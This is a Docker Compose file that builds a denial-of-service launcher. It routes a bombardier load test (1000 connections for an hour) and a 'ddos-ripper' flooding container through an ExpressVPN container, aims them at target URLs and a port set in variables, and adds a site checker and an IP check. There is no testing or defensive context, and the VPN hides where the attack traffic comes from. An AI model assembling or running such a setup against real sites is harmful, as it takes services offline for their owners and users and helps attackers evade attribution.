version: "3"
services:
  test:
    image: alpine/curl:3.14
    network_mode: "service:vpn"
    command: "curl ipinfo.io"
    depends_on: 
      - vpn
  bombardier:
    image: alpine/bombardier
    command: "-c 1000 -d 3600s -l ${B_TARGET_URL}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  ddosripper:
    image: nitupkcuf/ddos-ripper:latest
    command: "${R_TARGET_URL} -p ${TARGET_PORT}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  checksites:
    image: loginincorrect/checksites
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  vpn:
    image: polkaned/expressvpn
    cap_add:
      - NET_ADMIN
    devices: 
      - /dev/net/tun
    privileged: true
    tty: true
    environment:
      - SERVER=${VPN_COUNTRY}
      - ACTIVATION_CODE=${VPN_CODE}
    deploy:
      restart_policy:
        condition: on-failure
        max_attempts: 300
    command: /bin/bash